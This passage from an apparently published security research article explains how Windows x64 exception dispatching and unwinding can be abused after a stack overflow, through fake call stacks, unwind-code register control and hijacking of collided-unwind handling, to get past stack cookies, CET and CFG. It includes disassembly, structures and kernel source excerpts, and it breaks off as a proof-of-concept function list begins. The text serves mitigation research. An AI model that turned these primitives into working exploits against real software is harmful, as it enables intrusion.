    0x143F64   0x14  ExceptionHandler:              0x9CC44   
    Flags: UNW_FLAG_EHANDLER, UNW_FLAG_UHANDLER
    Unwind codes: .ALLOCSTACK 0x70; .PUSHREG R15; .PUSHREG R14; .PUSHREG R13; .PUSHREG R12; .PUSHREG RDI; .PUSHREG RSI; .PUSHREG RBX

I've noted a couple of times that the unwind operations are there to "undo" the prolog of the function. I'd like to show a practical example of this. Above, we have the runtime function entry for ntdll!RtlQueryAtomInAtomTable. Look at the instructions in the epilog of the function (intended to "restore" the changes of the prolog) and see if you notice a pattern with the unwind operations:

RtlQueryAtomInAtomTable proc near
; __unwind { // __GSHandlerCheck_SEH
; PROLOG
; ...
; FUNCTION CONTENT
; ...
mov     rcx, [rsp+0A8h+var_48]
xor     rcx, rsp        ; StackCookie
call    __security_check_cookie
; EPILOG
add     rsp, 70h			; .ALLOCSTACK 0x70
pop     r15				; .PUSHREG R15
pop     r14				; .PUSHREG R14
pop     r13				; .PUSHREG R13
pop     r12				; .PUSHREG R12
pop     rdi				; .PUSHREG RDI
pop     rsi				; .PUSHREG RSI
pop     rbx				; .PUSHREG RBX
retn
; }
RtlQueryAtomInAtomTable endp

The instructions in the epilog match the unwind operations and occur in the same order too! This is why runtime function entries are critical to the unwinding process. They effectively tell you how to restore the state of the stack and registers at any point in time, even if you're in the middle of executing a function. Without this context, writing a reliable unwinding mechanism to support arbitrary continuation at an exception handler would be much more challenging.

What About CET / Shadow Stacks?

An interesting mitigation we have not yet covered is Hardware-enforced Stack Protection, otherwise known as Control-flow Enforcement Technology (CET) for Intel CPUs and shadow stacks for AMD CPUs.

At a high level, when a function is called and a return address is pushed on the regular stack, a copy of that return address is also pushed on a "shadow stack" region. When the function returns, the address on the normal stack, which could have been corrupted by an attacker, is compared with the value on the shadow stack. If these values don't match, the program is terminated.

This is an opt-in mitigation, meaning you won't find it turned on by default. In 2021, Google Security wrote a blog about the work that went into enabling shadow stacks for Chrome. Although shadow stacks certainly aren't commonplace for most applications, it's a mitigation we may see increased adoption of in the future as it becomes more standardized.

This article is not intended to be a comprehensive look into how shadow stacks work in practice. If you're curious and want to learn more about specific implementation details, check out "RIP ROP: CET Internals in Windows 20H1" by Yarden Shafir and Alex Ionescu.

Going back to our trivial implementation of Exception Oriented Programming, let's say we are in the context of a process with Hardware-enforced Stack Protection. Even if we did escape a security cookie check by throwing an exception into a handler without one, when the handler returns, our corrupted return address on the stack would not match what's on the shadow stack and thus prevent our attack.

Core Concepts

In a classical ROP attack, the epilogues of functions are chained together to perform various operations, such as modifying registers and the stack, before returning to a function, simulating a call. Security cookies initially posed a significant challenge to ROP, as you typically couldn't modify the return address without also corrupting the cookie. With the next generation of system mitigations like shadow stacks, ROP is only becoming more challenging of an attack to leverage in real-world scenarios.

The trivial approach of escaping a security cookie check by throwing an exception only scratches the surface of what is possible through the unwinding process.

Here is a quick reminder about how exception dispatching works from a high level:

RtlDispatchException is called, which "virtually unwinds" the stack and calls the exception handlers for functions with the UNW_FLAG_EHANDLER flag in their UNWIND_INFO structure.
- If a handler returns EXCEPTION_CONTINUE_EXECUTION, the virtual unwinding process is halted, and execution continues where the exception occurred, with the original state of the registers.
- If a handler returns EXCEPTION_CONTINUE_SEARCH, the virtual unwinding process continues for other exception handlers.
- If in the context of the C-specific language handler and the exception filter (handler address) returns EXCEPTION_EXECUTE_HANDLER, RtlUnwind is called.
If RtlUnwind is called (i.e. by __C_specific_handler), the state of the stack/registers is unwound to continue execution at the C-specific exception handler (jump target). Unlike "virtual" unwinding, changes made to the CONTEXT structure by unwind operations will be reflected when execution continues at the handler.

There is an enormous amount of attack surface here. Sure, in the context of 64-bit applications, we will generally be limited to legitimate exception handlers and UNWIND_INFO structures. This is similar to how we are stuck with executing the epilog's of legitimate functions with ROP as "gadgets". As an attacker with a stack overflow vulnerability, however, since we can overwrite the call stack with whatever we want, we have complete control over what legitimate functions are used in the unwinding process and the order in which they are used.

How? In our trivial example, we modified the caller of our function with a cookie check to be a legitimate function that has an exception handler without a cookie check. Why stop at adding only one function to the call stack? Why not leverage unwind operations to modify registers to use untrusted values from the stack we control? This is where things start to get interesting. Let's break these attacks down.

What Can We Do in `RtlDispatchException` with Control over the Stack?

The first half of exception dispatching is to "virtually unwind" the stack in RtlDispatchException, calling exception handlers as we encounter them. As an attacker with influence over the stack, we can dictate the legitimate functions that RtlDispatchException will use when "virtually unwinding". So what does that let us do?

In the context of Windows binaries, we often deal with the C-specific language handler, where functions can specify what exceptions they want to catch with an exception filter. Remember that the C-specific exception handlers (jump targets) are triggered via RtlUnwind, which is outside the scope of RtlDispatchException.

Unfortunately, combined with the fact that the CONTEXT record we can influence when "virtual unwinding" occurs isn't used anywhere outside of this function, there is not much we can do in RtlDispatchException alone other than trigger a "desirable" C-specific exception handler (jump target) for unwinding.

To trigger a legitimate function's C-specific exception handler (jump target), we face two main requirements:

We need to know the address of the legitimate function (i.e. by knowing where the module is located).
- There is a slight exception we'll discuss later: we can leverage a partial return address overwrite to access the functions in the same module as what's already on our call stack.
The function's exception filter (handler address) needs to be 1 or return EXCEPTION_EXECUTE_HANDLER for our exception code.

Once we meet these requirements, the next step is to figure out where to write our "fake return address" on the stack. Our goal is to trick the unwinding process into thinking the function with our desired exception handler "called" the function where we generated an exception; hence it should be the one to handle our exception.

For our first parent caller, knowing the location to write is easy- it's just where the actual return address for the previous function is. Once we overwrite the first return address, however, we need to do some math.

[RUNTIME_FUNCTION]
...
    [UNWIND_INFO]
    ... 
    Unwind codes: .ALLOCSTACK 0x70; .PUSHREG R15; .PUSHREG R14; .PUSHREG R13; .PUSHREG R12; .PUSHREG RDI; .PUSHREG RSI; .PUSHREG RBX

Let's go through a quick example with ntdll!RtlQueryAtomInAtomTable. Imagine we replaced the first caller on the stack with an address to RtlQueryAtomInAtomTable. Where would we write the second caller's return address?

Each function's prolog is going to impact the stack differently. We have to account for each unwind operation that modifies Rsp. In this case, we have a stack allocation of 0x70 bytes (sub rsp, 0x70) and 7 registers being pushed (push r??). Assume our offset is relative to the location of the previous return address + 0x8. To calculate the total stack allocation for RtlQueryAtomInAtomTable, we do 0x70 + 0x8*7 = 0xA8, where 0x70 is our stack allocation, and 0x8*7 accounts for each register that was pushed. This means our next return address would be written to Rsp + 0xA8 following the previous one.

As I mentioned earlier, you can look at the source code of RtlDispatchException in the leaked Windows Research Kernel yourself. Additionally, here is the specific code that will tell you exactly how each unwind operation modifies Rsp.

Now that we know how to do this math, we can chain together an unlimited amount of functions on the call stack- while accounting for how they impact Rsp. However, before we get into RtlUnwind, there is one more small step to understand.

typedef struct _SCOPE_TABLE_AMD64 {
    DWORD Count;
    struct {
        DWORD BeginAddress;
        DWORD EndAddress;
        DWORD HandlerAddress;
        DWORD JumpTarget;
    } ScopeRecord[1];
} SCOPE_TABLE_AMD64, *PSCOPE_TABLE_AMD64;

Our first requirement was to know the location of the legitimate function protected by our desirable exception handler. Writing this function's address to the call stack alone is not sufficient. Remember that the scope record structure specifies what part of the function is protected by a given filter/handler with the BeginAddress/EndAddress fields. To ensure we trigger our desired JumpTarget handler, we need to add at least the BeginAddress of the relevant scope to our image base rather than only the function offset.

To recap, RtlDispatchException will virtually unwind through each function in our fake call stack. Once the entry with our desirable exception handler is reached, __C_specific_handler is called. Then, since our return address is within the scope bounds, the exception filter is called, which returns EXCEPTION_EXECUTE_HANDLER (or is 1, which means the same thing). This will trigger a final call to RtlUnwind, responsible for unwinding the stack and resuming execution at our exception handler!

The following section is where we'll get into some fun bits and explore why we'd want to include other functions (including those without exception handlers) before our final target.

What Can We Do in `RtlUnwind` with Control over the Stack?

Now that we understand how to create a fake call stack with any function we want and how to trigger RtlUnwind from the context of an exception, let's get into some primitives.

A quick reminder about the differences between RtlDispatchException and RtlUnwind. In RtlDispatchException, the CONTEXT structure being modified does not impact anything other than the virtual unwind process itself, whereas in RtlUnwind, changes will be reflected when execution continues. Also, in RtlDispatchException, only functions with UNW_FLAG_EHANDLER in their unwind info structure will have their ExceptionHandler called, whereas in RtlUnwind, the same is true with the UNW_FLAG_UHANDLER flag.

The four primary "primitives" we can leverage in RtlUnwind are:

We can resume execution at any C-specific exception handler (jump target) whose location we know and whose exception filter we've passed.
We can read untrusted values into registers from the stack and these values will be reflected once execution is resumed at our C-specific exception handler.
We can influence the offset on the stack we resume execution at.
We can execute any termination/unwind handler we want on our way to the unwind destination.
- For example, before reaching our desired exception handler (jump target), we could trigger the __finally blocks for any function we know the address of. This can lead to scenarios like a use-after-free or double-free.

We've covered how to do #1 already in the previous section. What about the other primitives?

Modify Any Register We Want

Earlier I said there were reasons we would want to include functions on our call stack prior to the function with our desirable exception handler. We can leverage the unwind operations of any function we know the location of to modify registers before we resume execution at a desirable exception handler.

How? Many functions do not have an exception handler defined, but they still have a runtime function / unwind info entry to allow them to be unwound. The reason unwind operations can provide us with very powerful primitives is because they are designed to restore untrusted data from the stack into registers to which we otherwise wouldn't have access.

For example, take the UWOP_PUSH_NONVOL operation that represents PUSH REGISTER instructions. Let's say our fake call stack had two functions, one that has no handler with a UWOP_PUSH_NONVOL unwind operation and one that has our desired exception handler. When the first function is unwound, RtlVirtualUnwind in RtlUnwind will replace the value of REGISTER with an untrusted value from the stack. By including this function in our call stack, we have direct control over the value of REGISTER when execution resumes at our exception handler. Even more powerful- we can chain together multiple functions with desirable unwind operations on the call stack to ultimately influence the value of almost every register!

Although you can see what each unwind operation does in the leaked Windows Research Kernel, I've created a small summary of the primitives they give us below:

UWOP_PUSH_NONVOL - Pulls an untrusted value from the stack and places it into a register specified by the OpInfo field.
UWOP_ALLOC_LARGE / UWOP_ALLOC_SMALL - Increments Rsp by a constant value.
UWOP_SET_FPREG - Set Rsp to the register specified by the FrameRegister field. Subtract 16 * the FrameOffset field. Both fields are from the unwind info structure.
UWOP_SAVE_NONVOL / UWOP_SAVE_NONVOL_FAR - Read a value from a constant offset on the stack into the register specified by the OpInfo field.
UWOP_PUSH_MACHFRAME - Pulls an untrusted value from the stack and places it into Rip. Rsp is then replaced with an untrusted value from offset 0x18 of the current stack.
- Note that Rip is replaced at the end of RtlUnwind (unless your exception code is STATUS_UNWIND_CONSOLIDATE), so no, you can't just restore execution at some arbitrary address from the stack.

As you can see, these operations provide powerful primitives to modify the state of registers before restoring at a legitimate exception handler. Of course, you would need to find these operations already present in an existing function's unwind info structure, but given that every function has an unwind info structure, you have a lot to choose from.

Another side effect to worry about is "what if I only want to replace a few registers, but my unwind info structure contains operations I don't want?". Fortunately, there is a trick we can use to get around this.

typedef union _UNWIND_CODE {
	struct {
		unsigned char CodeOffset;
		unsigned char UnwindOp : 4;
		unsigned char OpInfo : 4;
	};
	unsigned short FrameOffset;
} UNWIND_CODE, *PUNWIND_CODE;

When unwind operations are enumerated, it's not as simple as "just enumerate every operation if the exception address is in this function". For example, what happens if an exception occurs in the prolog?

To account for this exists the CodeOffset field of each UNWIND_CODE (unwind operation). An unwind operation is only executed if the address inside the function minus the function address itself is greater than or equal to the CodeOffset. This way, if an exception occurred in the prolog, only unwind operations corresponding to instructions that have already been executed would be processed.

This functionality is helpful because we can specify which unwind operation we want to start with!

	[UNWIND_INFO]
	Unwind codes:
		0x10: .ALLOCSTACK 0x70
		0xc: .PUSHREG R15
		0xa: .PUSHREG R14
		0x8: .PUSHREG R13
		0x6: .PUSHREG R12
		0x4: .PUSHREG RDI
		0x3: .PUSHREG RSI
		0x2: .PUSHREG RBX

For example, above, the unwind operations for ntdll!RtlQueryAtomInAtomTable are prepended with their CodeOffset fields. If we wanted to only replace the value of RBX, we place the address of RtlQueryAtomInAtomTable + 0x2 on the stack. This works because RtlpUnwindPrologue will assume an exception occurred at the PUSH RBX instruction, thus only process that unwind operation.

Influence the Stack Pointer

Another useful primitive is the ability to modify the stack pointer. Here are the most prominent reasons this would be helpful:

If we want to return to a legitimate function on the call stack that we haven't modified after faking the functions "below it", we need to align Rsp with that legitimate function's return address on the stack.
- If we are executing a desirable exception handler (jump target) who will ret into a legitimate caller, we'd need to account for the changes the handler will make to the stack.
If we are using a partial return address overwrite (i.e. because we don't have a leak), then controlling Rsp would let us choose which return address on the legitimate call stack we want to perform an overwrite on.
- Besides having a more comprehensive selection of modules to choose from, maybe we control the local variables for some caller and can find an exception handler that reads from these local variables.

The first method of influencing Rsp does require leaks, but it's relatively straightforward. As previously discussed, each function's unwind operations will impact Rsp differently. By placing legitimate functions on the call stack, we can use these unwind operations to increment Rsp by any amount we want. We can control this even further by using the previous trick of placing our return address in the middle of a prolog (to exclude certain unwind operations).

The second method of influencing Rsp without leaks is slightly more nuanced. When I was reading part 3 of Ken Johnson's series explaining how 64-bit exception handling worked on Windows, this paragraph caught my eye:

If RtlUnwindEx encounters a "leaf function" during the unwind process (a leaf function is a function that does not use the stack and calls no subfunctions), then it is possible that there will be no matching RUNTIME_FUNCTION entry for the current call frame returned by RtlLookupFunctionEntry. In this case, RtlUnwindEx assumes that the return address of the current call frame is at the current value of Rsp (and that the current call frame has no unwind or exception handlers). Because the x64 calling convention enforces hard rules as to what functions without RUNTIME_FUNCTION registrations can do with the stack, this is a valid assumption for RtlUnwindEx to make (and a necessary assumption, as there is no way to call RtlVirtualUnwind on a function with no matching RUNTIME_FUNCTION entry). The current call frame's value of Rsp (in the context record describing the current call frame, not the register value of rsp itself within RtlUnwindEx) is dereferenced to locate the call frame's return address (Rip value), and the saved Rsp value is then adjusted accordingly (increased by 8 bytes).

Ken described the logic that occurs during unwinding when a return address is retrieved from the stack that does not have a corresponding function entry. This is helpful for our purposes because what it means is that if we put an invalid address on the stack, the unwinding process will consider it a "leaf function" (since it can't find a function entry) and skip over it! This allows us to increment Rsp by 8 by including invalid addresses in our call stack.

I ran into an issue when I was testing this out myself. I had placed one constant address on the stack repeatedly, hoping that Rsp would keep incrementing by 8. What happened instead was after the first instance of the invalid constant, unwinding failed. I found the answer while reading through the WRK leak of RtlDispatchException:

    //
    // If the old control PC is the same as the return address,
    // then no progress is being made and the function tables are
    // most likely malformed.
    //
    if (ControlPc == *(PULONG64)(ContextRecord1.Rsp)) {
        break;
    }

What was happening was that the unwinding process included a check to make sure the previous control point did not match the next control point. So, to fix the behavior of incrementing Rsp as many times as I wanted, all I had to do was swap between two invalid constants. For example, if I wanted to increment Rsp by 0x20, my call stack would look like the following:

0x1111111111111111
0x2222222222222222
0x1111111111111111
0x2222222222222222

This is helpful when we don't have a leak because we can create a "sled" to get to any other legitimate return address on the stack.

Summary

To summarize the advanced variants of Exception Oriented Programming here is what we can do as an attacker with a stack overflow vulnerability:

We can restore execution at any C-specific exception handler (jump target) we know the location of.
We can directly control the state of registers when an exception is handled.
- This could be leveraged to corrupt the caller's state when our exception handler returns to a given function.
We can call the termination handler (__finally block) in any function we know the location of.
- This could be used to trigger a use-after-free or double-free scenario.

Without any leaks, we would be limited to partial return address overwrites. Fortunately, we can influence Rsp such that we can overwrite any address on the stack rather than only our direct parent. However, the primary method of controlling what values are used in unwind operations would be to overwrite the return address of a function we control specific local variables in. This is because we cannot overwrite the local variables without knowing the complete return address.

Does This Work with CET / Shadow Stacks?

One of the considerable benefits of these attacks is that we only hit a return instruction relevant to shadow stacks when our desired exception handler returns. Otherwise, the unwinding process blindly trusts addresses from the stack we control.

Still, the return instruction in the exception handler could pose a problem; what can we do to ensure we don't crash at that point?

First, whenever a new function on your call stack is enumerated by the unwinding process, a return address is "popped" from the shadow stack. This is important because when you unwind to a function N return addresses away, you need to get rid of those N return addresses on the shadow stack to ensure that the next ret instruction will match what's on the shadow stack.

This is a useful "feature" that we can abuse because we can cause corruption in the state of an application by returning to any function in the call stack we want to. By chaining together fake exception handlers, we can "pop" the shadow stack until we reach a desired parent function and use a jump target's ret instruction to return to it early.

CET does not verify that your return address is at the same stack offset where it was initially placed. Therefore, as long as the value matches what's on the shadow stack, it does not matter where on the stack the return address is retrieved from.

In those CET times: It's possible to return in unwinding to any address in the SSP, causing a "type confusion" between stack frames ;)
I really like the different variants of this concept https://t.co/I44p8uVAl2:) Type confusions are on fire! (stack frames, objc for PAC bypass) https://t.co/aZPcmb6XQb
— Saar Amar (@AmarSaar) January 21, 2020

This design weakness has been known for at least two years, however. Another security researcher, Saar Amar, highlighted how an attacker could cause a "type confusion" condition even with CET by unwinding to a desired function already on the call stack.

For example, imagine a parent function responsible for initializing a structure. By returning to a function above it mid-way during the initialization process, that parent may end up using an incomplete structure.

If you have a leak of the module location, you can predict the legitimate return address on the shadow stack (after the popping occurs) and put it on the normal stack where the following return address will be retrieved from. If you don't know the location of the legitimate function and can avoid overflowing it on the stack, you can create a fake call stack that will increment Rsp right up to that legitimate address.

Blast from the Past

Background

Part 5 of Ken Johnson's series on 64-bit exception handling discussed how certain edge cases known as "collided unwinds" were addressed. To give a high-level overview of what collided unwinds are, here is a good quote from Ken's blog:

A collided unwind occurs when an unwind handler initiates a secondary unwind operation in the context of an unwind notification callback. In other words, a collided unwind is what occurs when, in the process of a stack unwind, one of the call frames changes the target of an unwind. This has several implications and requirements in order to operate as one might expect:
1. Some unwind handlers that were on the original unwind path might no longer be called, depending on the new unwind target.
2. The current unwind call stack leading into RtlUnwindEx will need to be interrupted.
3. The new unwind operation should pick up where the old unwind operation left off. That is, the new unwind operation shouldn't start unwinding the exception handler stack; instead, it must unwind the original stack, starting from the call frame after the unwind handler which initiated the new unwind operation.

An even more straightforward way of thinking about a collided unwind is that it occurs when an unwind handler calls RtlUnwind itself. To solve this problem, Ken describes Microsoft's "elegant" solution: any call to an unwind handler is executed through a helper function, RtlpExecuteHandlerForUnwind.

typedef struct _DISPATCHER_CONTEXT {
    ULONG64 ControlPc;
    ULONG64 ImageBase;
    PRUNTIME_FUNCTION FunctionEntry;
    ULONG64 EstablisherFrame;
    ULONG64 TargetIp;
    PCONTEXT ContextRecord;
    PEXCEPTION_ROUTINE LanguageHandler;
    PVOID HandlerData;
    struct _UNWIND_HISTORY_TABLE *HistoryTable;
    ULONG ScopeIndex;
    ULONG Fill0;
} DISPATCHER_CONTEXT, *PDISPATCHER_CONTEXT;

When RtlpExecuteHandlerForUnwind is called by RtlUnwindEx, it saves a pointer to the current DISPATCHER_CONTEXT structure on the stack. As we can see above, this structure contains the entire internal state of RtlUnwindEx.

In an earlier section, we dumped the exception handlers for functions in ntdll, where the __GSHandlerCheck* variants were discovered. One of the other exception handlers I skipped over was RtlpUnwindHandler. This exception handler is actually used to protect RtlpExecuteHandlerForUnwind.

This is where the "elegant" solution kicks in. When an unwind handler calls RtlUnwindEx and the unwinding process occurs again, RtlUnwindEx calls the unwind handler of RtlpExecuteHandlerForUnwind, which is RtlpUnwindHandler. What does this handler do? It overwrites the current DISPATCHER_CONTEXT structure with the saved DISPATCHER_CONTEXT structure and returns ExceptionCollidedUnwind. When an unwind handler returns this result, RtlUnwindEx will use the overwritten values to replace its internal unwinding state. This allows the unwinding process to resume from where it was left off without any fuss.

An Overpowered Primitive

... there is not much we can do in RtlDispatchException alone other than trigger a "desirable" C-specific exception handler (jump target) for unwinding ...

When I was covering what we could do with control over the stack in RtlDispatchException, remember how I said, "not much"?

I lied.

While reading the leaked source for RtlDispatchException, I noticed that it too contained code to handle the ExceptionCollidedUnwind result returned by exception handlers. This may have been added to cover the unlikely edge case where an exception occurs, RtlUnwindEx is called, an unwind handler is called, and another exception occurs.

This is where I got a wild idea- as an attacker with a stack overflow vulnerability, we can modify the call stack to whatever we want, right? If we knew the location of ntdll, couldn't we make it seem like the function we are causing an exception in was called by RtlpExecuteHandlerForUnwind?

If this was true, knowing that RtlpUnwindHandler grabs the DISPATCHER_CONTEXT structure pointer from the stack, if we had any memory location in the process that was attacker-controlled, couldn't we overwrite the entire internal state of RtlDispatchException with our own values?

        //
        // The dispostion is collided unwind.
        //
        // A collided unwind occurs when an exception dispatch
        // encounters a previous call to an unwind handler. In
        // this case the previous unwound frames must be skipped.
        //
    case ExceptionCollidedUnwind:
        ControlPc = DispatcherContext.ControlPc;
        ImageBase = DispatcherContext.ImageBase;
        FunctionEntry = DispatcherContext.FunctionEntry;
        EstablisherFrame = DispatcherContext.EstablisherFrame;
        RtlpCopyContext(&ContextRecord1,
        DispatcherContext.ContextRecord);
		
        RtlVirtualUnwind(UNW_FLAG_EHANDLER,
                         ImageBase,
                         ControlPc,
                         FunctionEntry,
                         ContextRecord1,
                         &HandlerData,
                         &EstablisherFrame,
                         NULL);

        ContextRecord1.Rip = ControlPc;
        ExceptionRoutine = DispatcherContext.LanguageHandler;
        HandlerData = DispatcherContext.HandlerData;
        HistoryTable = DispatcherContext.HistoryTable;
        ScopeIndex = DispatcherContext.ScopeIndex;
        Repeat = TRUE;
        break;

Knowing the location of ntdll and some memory we control certainly isn't trivial, but the impact is astronomical. For example, in the (slightly corrected) WRK excerpt above, when the ExceptionCollidedUnwind result is returned, the overwritten DispatcherContext variable is used to update the current Rip, image base, runtime function entry, CONTEXT record, the UNWIND_HISTORY_TABLE, and even a pointer that specifies an ExceptionRoutine to immediately call. All of this is controlled by an attacker with a stack overflow vulnerability.

See the Repeat variable getting set to TRUE? What happens is right after the break, the while loop for calling an exception handler repeats without calling RtlLookupFunctionEntry, and the attacker-controlled ExceptionRoutine is passed to RtlpExecuteHandlerForException, whose the second argument (RDX/EstablisherFrame) is entirely controlled by the attacker as well.

To add insult to injury, the call inside of RtlpExecuteHandlerForException to the attacker-controlled ExceptionRoutine is done without a Control Flow Guard (or xFG) check, meaning we can call into the middle of any function or any unaligned address.

I can't help but draw parallels to the x86 SEH hijacking attacks from ~15+ years ago, where an attacker could overflow the stack and replace the exception handler that would be called. With this primitive, we can achieve the same result with even more control.

To give you an idea of what's possible with the variables we can modify:

We can call any function anywhere we want (via LanguageHandler) with the second argument (RDX/EstablisherFrame) completely controlled.
When RtlVirtualUnwind is called following the ExceptionCollidedUnwind result, we have full control over the ControlPc, ImageBase, RUNTIME_FUNCTION structure, and UNWIND_INFO structure it uses.
- This means we can execute any unwind operations we want. We'll talk more about how this can be abused in practice later.
If we meet certain conditions (discussed later) and specify an exception handler that returns EXCEPTION_CONTINUE_SEARCH, we can continuously hijack the dispatching/unwinding process since we control the UNWIND_HISTORY_TABLE structure.
- The history table is used as a cache to store previously retrieved RUNTIME_FUNCTION entries. By creating a malicious history table, we can specify our own RUNTIME_FUNCTION structure for any function we know the location of.
If we set LanguageHandler to the C-specific exception handler in ntdll, we can define a custom SCOPE_TABLE structure to call any ntdll functions we want consecutively (as long as the functions return 0).

Enough about what we can do; let's go through a practical example!

Planning Our Attack

To leverage this primitive in a stack overflow attack, we need to meet two major requirements:

We need to know the location of ntdll.
We need to know the location of attacker-controlled memory. This memory can be anywhere in the process.

Although we have significant control over the unwinding process, we still have many quirks and challenges to overcome. To best describe these limitations, I'll explain what occurs in RtlDispatchException when the ExceptionCollidedUnwind result is returned.

The ControlPc, ImageBase, FunctionEntry, and ContextRecord variables in RtlDispatchException are updated to attacker-controlled values.
- The only variable we haven't explicitly covered is ControlPc, which represents the current Rip value. During each step in the unwinding process, this is updated to the return address from the call stack.
RtlVirtualUnwind is called. As an attacker, we have complete control over the runtime function and unwind info structures used for the virtual unwind.
- This means we can specify any unwind operations we want. Note that the Rsp register in our context record must be a valid pointer no matter what- although it doesn't need to point at the stack (i.e. it could point at our controlled memory).
- These unwind operations are incredibly powerful. For example, we can easily chain arbitrary reads by setting Rsp to some offset inside of ntdll and leveraging UWOP_PUSH_NONVOL to read an address from Rsp, UWOP_ALLOC_* to increment Rsp by any offset, etc.
- At the end of this virtual unwind, our Rsp and Rip registers in the context record are updated. By default, Rip is read by dereferencing Rsp, and Rsp is incremented depending on the unwind operations (not true in cases like UWOP_PUSH_MACHFRAME).
- If Rip matches the current ControlPc, the unwinding process is halted because it is assumed the stack is corrupted.
Once the virtual unwind is complete, the EstablisherFrame, HandlerData, ExceptionRoutine, and HistoryTable are all updated to attacker-controlled values.
The exception handler loop continues and the function we specified in LanguageHandler is called. The first argument (RCX) is a pointer to the exception record, the second argument (RDX) is the establisher frame we control entirely, the third argument (R8) is a pointer to the context record, and the fourth argument (R9) is a pointer to the dispatcher context structure.
The return value of this function is checked again.
- If the result is ExceptionContinueExecution, execution continues where the exception occurred.
- If the result is ExceptionContinueSearch, the search for an exception handler continues.
- If the result is ExceptionNestedException, then the exception flags are updated and the search continues.
- If the result is ExceptionCollidedUnwind, we start over from step 1.
- Any other result leads to a non-continuable exception. This effectively means that any exception routine you specify must return a value between 1-2 to ensure the search is continued.
If the search is continued, our first major challenge occurs. The Rsp record is validated to be inside the low/high limit of the stack.
- I'll talk about a complex way we can pass this check in a later section.
ControlPc is updated to Rip, and the unwind loop continues assuming Rsp is in the stack's bounds.
At the beginning of the loop, ControlPc and our controlled HistoryTable are passed to RtlLookupFunctionEntry to find a corresponding runtime function entry.
- Since we control the history table, if we can predict the value of ControlPc, we can define our own ImageBase and RUNTIME_FUNCTION pointers.
RtlVirtualUnwind is called again and practically the same logic we mentioned in step 2 occurs. The significant differences worth mentioning are:
- The EstablisherFrame is updated to the value of Rsp. If the FrameRegister field in the unwind info structure is populated, it is instead set to the value of that register (minus 0x10 * the FrameOffset field).
- If the UNW_FLAG_EHANDLER flag is set, the ExceptionRoutine is calculated by adding the ExceptionHandler field from the unwind info structure to the ImageBase.
After this virtual unwind is where our second major challenge occurs. EstablisherFrame is validated to be within the bounds of the stack.
- During the first loop, Rsp must have already been a value that points at the stack; hence EstablisherFrame would likely be updated to that valid stack pointer.
- The problem is that we no longer have arbitrary control over the second argument to the exception handler. Any RDX value we specify must be within the stack's low/high limits (also stored on the stack).
Assuming an exception handler was defined, the logic from step 3 starts over again.

As a reminder, you can read the source code for all of this logic in the leaked WRK.

The most significant barrier to simply looping over and over again, calling a different exception handler of our choice each time, is that after the initial ExceptionCollidedUnwind result is handled, we quickly lose control over the second argument and we need to somehow guarantee that Rsp is within the bounds of the stack.

Of course, this is easy if the attacker-controlled memory you know the location of is the stack. But requiring the location of attacker-controlled memory and requiring that it is on the stack is lame. This is quite a powerful primitive; we should be able to perform this attack regardless of whether our controlled memory is in the stack, the heap, or anywhere else.

Initially, I spent ~2 weeks developing a complex exploit chain to execute arbitrary shellcode without needing to step outside the bounds of the unwinding process. It worked with CET and CFG in strict mode but had some stability issues. What I realized was during this process, I had discovered several quite powerful primitives such that if our goal is only to execute code remotely, there were much simpler (and more stable) methods of gaining arbitrary code execution. Let's discuss using some of these primitives to create a stable proof-of-concept to execute arbitrary code.

Allowing Functions to Return Zero

A frustrating challenge I faced while writing an exploit was that any exception handler I called had to return 1 (ExceptionContinueSearch) or 2 (ExceptionNestedException). Triggering 3 (ExceptionCollidedUnwind) would enter an infinite loop, as it would keep calling the function repeatedly (since the dispatcher context would remain the same).

                } else {
                    ExceptionFilter =
                        (PEXCEPTION_FILTER)(ScopeTable->ScopeRecord[Index].HandlerAddress + ImageBase);
                    Value = (ExceptionFilter)(&ExceptionPointers, EstablisherFrame);
                }
                //
                // If the return value is less than zero, then dismiss the
                // exception. Otherwise, if the value is greater than zero,
                // then unwind to the target exception handler. Otherwise,
                // continue the search for an exception filter.
                //
                if (Value < 0) {
                    return ExceptionContinueExecution;
                } else if (Value > 0) {
	                // RtlUnwind is called.
	                ...
	            }
		        // Loop continues.
	...
	// Eventually, ExceptionContinueSearch is returned.
	return ExceptionContinueSearch;

While reading the code for the __C_specific_handler, which is included with the MSVCRT (C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\crt\src\amd64\chandler.c), I discovered that if the exception filter it called returned zero, it will continue enumerating the scope table.

This meant we could call arbitrary functions by setting our exception handler to __C_specific_handler and crafting a malicious scope table. As long as the return value of our fake exception filter was zero, our search would continue without issue. Given that many functions in the ntdll module return an NTSTATUS value and STATUS_SUCCESS is zero, this significantly increased the number of functions we could call.

Execute Multiple Exception Handlers Consecutively

The following primitive was found quickly after the last- the ability to execute as many functions as I wanted consecutively inside a module I knew the location of. If you think about the RtlDispatchException unwinding process, it may seem as if to call multiple functions, we'd need to perform an entire unwind loop to specify a new exception routine pointer.

typedef struct _SCOPE_TABLE_AMD64 {
    DWORD Count;
    struct {
        DWORD BeginAddress;
        DWORD EndAddress;
        DWORD HandlerAddress;
        DWORD JumpTarget;
    } ScopeRecord[1];
} SCOPE_TABLE_AMD64, *PSCOPE_TABLE_AMD64;

With a malicious scope table structure, we can define multiple scope records that overlap. Nothing stops the BeginAddress/EndAddress fields from specifying the same scope. As long as our exception filters (handler address) return zero, the table is entirely enumerated, and we can call functions consecutively. One relevant limitation is that we are stuck with the same second argument (RDX) value across all consecutive function calls.

What Functions Do We Call?

The collided unwind primitive is powerful sure, but what functions can we call to get remote code execution only controlling the second argument?

Even though we don't control the other arguments entirely, they're worth calling out. For example, the fact that the first argument (RCX) will be a consistent pointer to some writable memory region can still be helpful.

I discovered most of the valuable functions we can abuse for this attack by spending hours reviewing published headers for ntdll. For example, two great resources I used were the Process Hacker Native API header collection and the source code of ReactOS. What I did with these headers was use the return type and SAL annotations, which specify whether arguments are written to or are used as input, to find potentially "desirable" functions.

For example, if a function's return type was NTSTATUS, a zero return value was guaranteed as long as the function succeeded. SAL annotations let me search for functions that met specific criteria like "find functions where the second argument I control is written to".

It's not worth going through every function I found potentially valuable, as there were quite a lot. So instead, I'll focus on those we leverage in our minimal PoC.

RtlInitUnicodeStringEx

NTSTATUS
NTAPI
RtlInitUnicodeStringEx(
    _Out_ PUNICODE_STRING DestinationString,
    _In_opt_z_ PCWSTR SourceString
    );

The first function I want to call out is RtlInitUnicodeStringEx, which takes our completely controlled second argument and initializes a UNICODE_STRING structure in the buffer specified by the first argument.

